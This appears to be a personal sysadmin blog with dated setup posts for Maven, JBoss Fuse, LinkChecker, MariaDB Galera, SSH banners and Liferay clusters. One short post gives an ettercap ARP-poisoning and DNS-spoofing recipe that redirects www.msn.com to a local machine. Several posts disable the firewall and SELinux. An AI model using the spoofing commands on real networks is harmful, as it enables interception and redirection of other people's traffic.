Friday, August 19, 2016

maven simple setup

Installation

1. download maven

2. Ensure JAVA_HOME environment variable is set and points to your JDK installation

3. extract Maven and put it in /opt/
tar xzvf apache-maven-3.3.9-bin.tar.gz

4. make a softlink
ln -s apache-maven-3.3.9 maven

5. edit the user's .bash_profile and add this into it
export M2_HOME=/opt/maven 
export PATH=${M2_HOME}/bin:${PATH}
6. log out and log in again for the changes to take effect, then test Maven
mvn --version

7. create a new project and let it generate a new pom.xml
mvn archetype:generate -DgroupId=com.mycompany.app -DartifactId=my-app -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false
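once generated, you can build and run the project to verify the setup (the JAR name below assumes the quickstart default version 1.0-SNAPSHOT in the generated pom.xml):
cd my-app
mvn package
java -cp target/my-app-1.0-SNAPSHOT.jar com.mycompany.app.App
it should print "Hello World!"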


reference:
https://maven.apache.org/guides/getting-started/maven-in-five-minutes.html
http://www.tutorialspoint.com/maven/maven_environment_setup.htm

Thursday, August 18, 2016

jboss fuse simple setup

Environment
OS: RedHat Enterprise 7
Java: Oracle jdk1.8.0_91
Fuse: jboss-fuse-6.2.1.redhat-117

Firewall disable
systemctl stop firewalld
systemctl disable firewalld

SELinux disable
vi /etc/selinux/config
change the SELINUX line to SELINUX=disabled
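note: the config change only takes effect after a reboot. to stop enforcement immediately for the current session, you can also switch SELinux to permissive mode:
setenforce 0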

Java Setup

1. download Java from oracle website

2. edit the /etc/hosts file and add your IP and hostname to it
172.20.1.100   fuse1
if you are setting up a Fuse cluster, add fuse2 and fuse3 to every node's hosts file as well

3. unzip Java and put it in /opt
then make a softlink
ln -s jdk1.8.0_91 jdk1.8.0
this makes it easy to upgrade Java in the future: just extract the new Java update and repoint the softlink
then add the following line to .bash_profile
export JAVA_HOME=/opt/jdk1.8.0
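note: JAVA_HOME alone does not put the java binary on your PATH, so if no system Java is installed you will likely also want this line (my addition, matching the layout above):
export PATH=${JAVA_HOME}/bin:${PATH}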

4. log out and log in again for the Java settings to take effect, then test using this command
java -version



Fuse Setup

NODE 1
1. unzip JBoss Fuse to /opt and make a softlink as well
ln -s jboss-fuse-full-6.2.1-redhat-117 fuse

2. edit <fuse-install-dir>/etc/system.properties to rename the Karaf instance from root to fuse1:
# Name of this Karaf instance
karaf.name=fuse1

3. start fuse
cd /opt/fuse
bin/fuse

4. From the Fuse CLI, create an ESB admin user using the following command, substituting <user name> and <user password> with actual values:
esb:create-admin-user --new-user <user name> --new-user-password <user password>

5. Shut down Fuse and restart it as a background service using:
bin/start

6. Connect to Fuse using admin user created above:
bin/client -u <user name> -p <user password>
7. Next, create the fabric:
fabric:create --zookeeper-password <zookeeper-password> --zookeeper-data-dir zkdata --resolver localhostname --wait-for-provisioning

8. As a best practice, we do not deploy application services to root containers, so we can remove the jboss-fuse-full profile from the container:
container-remove-profile fuse1 jboss-fuse-full



NODE 2 & NODE 3
1. After unzipping, JBoss Fuse will be installed in /opt/jboss-fuse-full-6.2.1-redhat-117. For convenience, create a symbolic link:
cd /opt
ln -s jboss-fuse-full-6.2.1-redhat-117 fuse

2. edit <fuse-install-dir>/etc/system.properties to rename the Karaf instances from root to fuse2 and fuse3, respectively:
Node 2 (172.20.1.101):
# Name of this Karaf instance
karaf.name=fuse2

Node 3 (172.20.1.102):
# Name of this Karaf instance
karaf.name=fuse3

3. Start Fuse:
$ cd /opt/fuse
$ bin/fuse

4. Join the fabric:
fabric:join --zookeeper-password <zookeeper-password> --resolver localhostname fuse1:2181

5. Shut down Fuse and restart it as a background service using:
$ bin/start
6. Connect to Fuse using admin user created above:
$ bin/client -u <user name> -p <user password>
At this point, 3 JBoss Fuse Fabric containers have been created and started.
On 172.20.1.100 (fuse1), log in to the Fuse Fabric CLI and issue the following command to create an
ensemble:
JBossFuse:fabric@fuse1> ensemble-add fuse2 fuse3

Once the command is completed, the fabric container list should be similar to:
JBossFuse:fabric@fuse1> container-list
   [id]    [version]  [connected]  [profiles]                      [provision status]
   fuse1*  1.0        yes          fabric, fabric-ensemble-0001-1  success
   fuse2   1.0        yes          fabric, fabric-ensemble-0001-2  success
   fuse3   1.0        yes          fabric, fabric-ensemble-0001-3  success

The Fuse setup is complete. The Fuse management console can be accessed at http://172.20.1.100:8181



Monday, August 15, 2016

LinkChecker

Install LinkChecker

# wget --no-check-certificate https://pypi.python.org/packages/source/L/LinkChecker/LinkChecker-9.3.tar.gz


There are 2 ways to install:

  • Manual installation, where you download the source and run the install yourself
  • Automatic installation of LinkChecker using pip


Manual Installation
For CentOS/RHEL 6 -> enable Software Collections to install Python 2.7
For CentOS/RHEL 7 -> just use yum install python

Enable Software Collections
RHEL -> # subscription-manager repos --enable rhel-server-rhscl-6-rpms
Centos -> # yum install centos-release-scl

Then install python27
# yum install python27
You need to enable it in order to use it:
# scl enable python27 bash

Install the remaining packages needed to run it:
# yum install gcc python-requests qt-devel

For details on how to install, you can read the doc at LinkChecker-9.3/doc/install.txt

# make -C doc/html
# python setup.py sdist --manifest-only
# python setup.py build

# python setup.py install

You can do a test run using this command
# linkchecker www.google.com -Fcsv//tmp/google.csv


Troubleshooting
If you encounter the error “This program requires Python requests 2.2.0 or later” when you do a test run,
downgrade the requests version, as LinkChecker 9.3 has a bug with requests 2.10.
Downgrade using pip

# yum install python27-python-pip
# pip install requests==2.9.2



Auto Installation

# yum install gcc qt-devel

Enable Software Collections if you are using CentOS/RHEL 6, and install python27 & python27-python-pip
# yum install python27-python-pip python27

Then install LinkChecker using pip
# scl enable python27 bash
# pip install LinkChecker
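as with the manual install, you can verify the pip install with a quick test run:
# linkchecker www.google.com -Fcsv//tmp/google.csv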

Tuesday, July 12, 2016

spoof DNS using kali linux

1. locate the file named etter.dns
# locate etter.dns

2. open the file using nano/vi/vim

3. edit after the line "*wildcards in PTR are not allowed"
for example, you can add this below that line
www.msn.com A 192.168.1.8

4. set ip_forward in /proc/sys/net/ipv4 to 1 to enable IP forwarding
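one quick way to do this (a standard kernel toggle, not specific to ettercap):
# echo 1 > /proc/sys/net/ipv4/ip_forward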

5. start ettercap
ettercap -T -q -M arp:remote -P dns_spoof

(press q to quit)

reference:
https://www.cybrary.it/0p3n/infosec-101-dns-spoof/

Monday, April 18, 2016

mariadb cluster

Environment I'm using
OS: RHEL7
database: MariaDB 10.1.13
firewalld: off
SElinux: off

===== Install MariaDB =====

by default, your OS includes MariaDB in the yum repo, but it is an old version.
please add this repo to enable the latest version officially from MariaDB

# vim /etc/yum.repos.d/mariadb.repo

---------- mariadb.repo ----------

[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/10.1/rhel7-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1

---------- END ----------

for the baseurl, if you are using CentOS or another distribution, you can check the MariaDB repositories page for the correct path


install MariaDB using this command

# yum install mariadb-server



===== Setup MariaDB for Cluster =====

open and edit my.cnf
and add the [galera] section shown below

# vim /etc/my.cnf

---------- my.cnf ----------
#
# This group is read both by the client and the server
# use it for options that affect everything
#
[client-server]

#
# include all files from the config directory
#
!includedir /etc/my.cnf.d

[galera]

wsrep_on=ON
wsrep_provider=/usr/lib64/galera/libgalera_smm.so
binlog_format=ROW
wsrep_cluster_address='gcomm://'
wsrep_cluster_name='galera_cluster'
wsrep_node_name='node1'

---------- END ----------

for the 2nd database node, just repeat the installation steps, but in my.cnf you need to edit these lines:
wsrep_cluster_address='gcomm://<node 1 IP address>'
wsrep_node_name='node2'
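for reference, node 2's full [galera] section would look like this (a sketch, assuming the same provider path and cluster name as node 1):

---------- my.cnf (node 2) ----------

[galera]

wsrep_on=ON
wsrep_provider=/usr/lib64/galera/libgalera_smm.so
binlog_format=ROW
wsrep_cluster_address='gcomm://<node 1 IP address>'
wsrep_cluster_name='galera_cluster'
wsrep_node_name='node2'

---------- END ----------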


Start both databases (start node 1 first; its empty gcomm:// address bootstraps the cluster)
# systemctl start mariadb

log in to MySQL and check whether the cluster formed successfully

MariaDB [(none)]> SHOW STATUS LIKE 'wsrep_cluster_size';
+--------------------+-------+
| Variable_name      | Value |
+--------------------+-------+
| wsrep_cluster_size | 2     |
+--------------------+-------+
1 row in set (0.01 sec)

the output above shows a cluster size of 2 nodes, which means it was successful.

you can check other cluster info using this command

MariaDB [(none)]> show global status like 'wsrep_%';
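another quick health check is wsrep_local_state_comment (a standard Galera status variable); a value of Synced means the node is fully in sync with the cluster:

MariaDB [(none)]> SHOW STATUS LIKE 'wsrep_local_state_comment';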

Monday, April 11, 2016

SSH Login Banner

there are 2 types of banner:
one is shown before you log in,
and the other is shown after you successfully log in

-------------------------------------------------------------------
Show before login

by default, a banner is already prepared for us, but it is not used.
it is located at /etc/issue.net
and shows the kernel version as the banner at login.
you can use this or use your own.
just create a file, for example:
# vim /etc/ssh/banner
and put something like this

#########################
#                       #
#  Welcome to Centos 7  #
#                       #
#########################

then enable the banner
# vim /etc/ssh/sshd_config
find and edit this

# no default banner path
#Banner none

to

# no default banner path
Banner /etc/ssh/banner

then restart the sshd service
# systemctl restart sshd
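to verify, open a new SSH connection; the banner prints before the password prompt:
# ssh localhost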
-----------------------------------------------------------------

Show after success login

# vim /etc/motd

and edit it to your liking

setup Liferay 7 tomcat bundle + cluster

OS = CentOS Linux release 7.2.1511 (Core)
Liferay version = liferay-portal-tomcat-7.0-ce-ga1-20160331161017956
Java = java version "1.7.0_79"

===== Liferay =====

1. download Java and install it
    in my case, I downloaded Oracle Java SDK 7 from
    http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html
    download the RPM for easy install and upgrade
    # yum localinstall jdk-7u79-linux-x64.rpm

2. download Liferay and extract it.
    in my case, I extracted it into /opt
    and renamed it to liferay, so it becomes /opt/liferay

3. go to /opt/liferay/tomcat-8.0.32/bin
    do a test run once to confirm it works with the default settings
    # ./startup.sh
    use a browser and try to access it at
    <server ip>:8080
    and stop it after confirming it works
    # ./shutdown.sh

4. install Tomcat Native for better performance
    in the bin directory, extract tomcat-native.tar.gz and navigate to the native directory inside it
    # ./configure --with-apr=/usr/bin/apr-1-config --with-java-home=/usr/java/default --with-ssl=/usr/bin/openssl --prefix=/usr
    # make
    # make install

5. go back to the bin directory and extract commons-daemon-native.tar.gz
    navigate into the unix folder
    # ./configure --with-java=/usr/java/default
    # make
    # cp jsvc ../..

6. add a tomcat user so Liferay runs as it instead of as root
    # useradd tomcat
    # chown -R tomcat: /opt/liferay

7. in the tomcat bin directory, edit setenv.sh and change the Xmx value to suit your server's memory.
    in my case, I also manually set the Xms value

====== startup script =====

since CentOS 7 uses systemd, below is the guide on how to add one.
note: the unit file uses /opt/liferay/tomcat, so either create a softlink (cd /opt/liferay; ln -s tomcat-8.0.32 tomcat) or adjust the paths to match your directory
# cd /etc/systemd/system
# vim tomcat.service

=== tomcat.service ===

# Systemd unit file for tomcat
[Unit]
Description=Apache Tomcat Web Application Container
After=syslog.target network.target

[Service]
Type=forking
#ExecStart=/etc/init.d/tomcat start
ExecStart=/opt/liferay/tomcat/bin/startup.sh
ExecStop=/opt/liferay/tomcat/bin/shutdown.sh
User=tomcat
Group=tomcat

TimeoutStartSec=0
TimeoutStopSec=600

[Install]
WantedBy=multi-user.target

=== END ===

enable it to run at startup
# systemctl enable tomcat.service

now you can test with systemctl start and stop to confirm it works
# systemctl start tomcat
# systemctl stop tomcat

monitor the log at /opt/liferay/tomcat/logs/catalina.out
to make sure it fully starts up without errors


===== Apache =====

you can either use your firewall to redirect port 80 to port 8080
or
put Apache in front with mod_jk (which talks to Tomcat over the AJP connector) to serve it on port 80
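for the firewall option on CentOS 7, a minimal firewalld sketch (this assumes firewalld is running, unlike the earlier posts where it was disabled):
# firewall-cmd --permanent --add-forward-port=port=80:proto=tcp:toport=8080
# firewall-cmd --reload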




===== cluster =====

1. edit <liferay>/tomcat/conf/context.xml
     change <Context>
     to <Context distributable="true">

2. edit server.xml
    change <Engine name="Catalina" defaultHost="localhost">
    to <Engine name="Catalina" defaultHost="localhost" jvmRoute="node1">
then add this below it as well

=== server.xml ===

<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
        channelSendOptions="6">

  <Manager className="org.apache.catalina.ha.session.BackupManager"
        expireSessionsOnShutdown="false"
        notifyListenersOnReplication="true"
        mapSendOptions="6"/>


  <Channel className="org.apache.catalina.tribes.group.GroupChannel">
    <Membership className="org.apache.catalina.tribes.membership.McastService"
        address="228.0.0.4"
        port="45564"
        frequency="500"
        dropTime="3000"/>
    <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
      address="auto"
        port="5000"
        selectorTimeout="100"
        maxThreads="6"/>

    <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
      <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
    </Sender>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.TcpFailureDetector"/>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.MessageDispatch15Interceptor"/>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.ThroughputInterceptor"/>
  </Channel>

  <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
         filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>

  <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
</Cluster>
=== end ===

3. edit <liferay>/tomcat/conf/Catalina/localhost/ROOT.xml and add this inside its <Context> element

=== ROOT.xml ===

<Resource
        name="jdbc/LiferayPool"
        auth="Container"
        type="javax.sql.DataSource"
        driverClassName="com.mysql.jdbc.Driver"
        url="jdbc:mysql://<DB IP>/<DB name>?useUnicode=true&amp;characterEncoding=UTF-8"
        username="DB username"
        password="DB password"
        maxActive="100"
        maxIdle="30"
        maxWait="60000"
    />

=== end ===

4. then in <liferay>/tomcat/webapps/ROOT/WEB-INF/classes, create a portal-ext.properties file and put this into it

=== portal-ext.properties ===

jdbc.default.jndi.name=jdbc/LiferayPool

=== end ===
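on the 2nd node, repeat the same cluster steps; the only difference I would expect is the jvmRoute in server.xml (my assumption, following the node1 naming above):

=== server.xml (node 2) ===

<Engine name="Catalina" defaultHost="localhost" jvmRoute="node2">

=== end ===

both nodes should use the same ROOT.xml and portal-ext.properties so they share one Liferay database.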

Wednesday, March 2, 2016

deploy liferay EE into Jboss 6 EAP manually

I am using JBoss EAP 6.4
with Java 1.7.0_79
and for Liferay, I am deploying Liferay Portal 6.2 EE SP14
with the Liferay Portal 6.2 EE SP14 Dependencies
the dependencies are needed for Liferay to run if you build it yourself

unzip JBoss EAP and install Java
create a folder called liferay and put the extracted JBoss into it

in my case, I put liferay at /opt, so it will look like this
/opt/liferay/jboss

1. deploy dependencies


cd to the jboss folder and make a new dir like this
<jboss>/modules/com/liferay/portal/main

unzip liferay-portal-dependencies-6.2-ee-sp14 and put everything into <jboss>/modules/com/liferay/portal/main
put the MySQL connector there as well if you are using MySQL

in the same directory, create a file named module.xml
and put this into it

<?xml version="1.0"?>

<module xmlns="urn:jboss:module:1.0" name="com.liferay.portal">
        <resources>
                <resource-root path="hsql.jar" />

                <resource-root path="portal-service.jar" />
                <resource-root path="portlet.jar" />
                <resource-root path="mysql-connector-java-5.1.38-bin.jar" />
        </resources>
        <dependencies>
                <module name="ibm.jdk" />
                <module name="javax.api" />
                <module name="javax.mail.api" />
                <module name="javax.servlet.api" />
                <module name="javax.servlet.jsp.api" />
                <module name="javax.transaction.api" />
        </dependencies>
</module>

please edit the MySQL connector JAR name to match yours

2. Jboss configuration

part 1

go to liferay/jboss/standalone/configuration/
and edit standalone.xml
between </extensions> and <management> (note: should be around lines 27 - 30),
add this into it

<system-properties>
        <property name="org.apache.catalina.connector.URI_ENCODING" value="UTF-8"/>
        <property name="org.apache.catalina.connector.USE_BODY_ENCODING_FOR_QUERY_STRING" value="true"/>
</system-properties>

part 2

then search for deployment-scanner
and add deployment-timeout="240"

it will look something like this
<deployment-scanner path="deployments" relative-to="jboss.server.base.dir" scan-interval="5000" deployment-timeout="240"/>

part 3

then search for <subsystem xmlns="urn:jboss:domain:security:1.2">
and add this into it

<security-domain name="PortalRealm">
    <authentication>
       <login-module code="com.liferay.portal.security.jaas.PortalLoginModule" flag="required" />
    </authentication>
</security-domain>

it will look something like this

        <subsystem xmlns="urn:jboss:domain:security:1.2">
            <security-domains>
                <security-domain name="other" cache-type="default">
                    <authentication>
                        <login-module code="Remoting" flag="optional">
                            <module-option name="password-stacking" value="useFirstPass"/>
                        </login-module>
                        <login-module code="RealmDirect" flag="required">
                            <module-option name="password-stacking" value="useFirstPass"/>
                        </login-module>
                    </authentication>
                </security-domain>
                <security-domain name="jboss-web-policy" cache-type="default">
                    <authorization>
                        <policy-module code="Delegating" flag="required"/>
                    </authorization>
                </security-domain>
                <security-domain name="jboss-ejb-policy" cache-type="default">
                    <authorization>
                        <policy-module code="Delegating" flag="required"/>
                    </authorization>
                </security-domain>
                <security-domain name="PortalRealm">
                    <authentication>
                        <login-module code="com.liferay.portal.security.jaas.PortalLoginModule" flag="required" />
                   </authentication>
                </security-domain>
            </security-domains>
        </subsystem>

part 4

search enable-welcome-root and change it to false

<virtual-server name="default-host" enable-welcome-root="false">

3. deploy Liferay war

create a ROOT.war folder in liferay/jboss/standalone/deployments
and extract the Liferay .war file into it (run this from inside the ROOT.war folder):

# jar -xvf liferay.war

at the same level as ROOT.war, create an empty file called ROOT.war.dodeploy
# touch ROOT.war.dodeploy

In the ROOT.war folder, open the WEB-INF/jboss-deployment-structure.xml file. In this file, replace the <module name="com.liferay.portal" /> dependency with the following configuration:

<module meta-inf="export" name="com.liferay.portal">
    <imports>
        <include path="META-INF" />
    </imports>
</module>

This allows OSGi plugins like Audience Targeting to work properly, by exposing the Portal API through the OSGi container.
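with everything in place, start JBoss and watch the deployment scanner pick up the marker file; it replaces ROOT.war.dodeploy with ROOT.war.isdeploying and then ROOT.war.deployed on success (or ROOT.war.failed on error):

# bin/standalone.sh
# tail -f standalone/log/server.log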

reference:
1. https://www.liferay.com/group/customer/knowledge/kb/-/knowledge_base/article/23340173 (requires logging in to liferay.com first)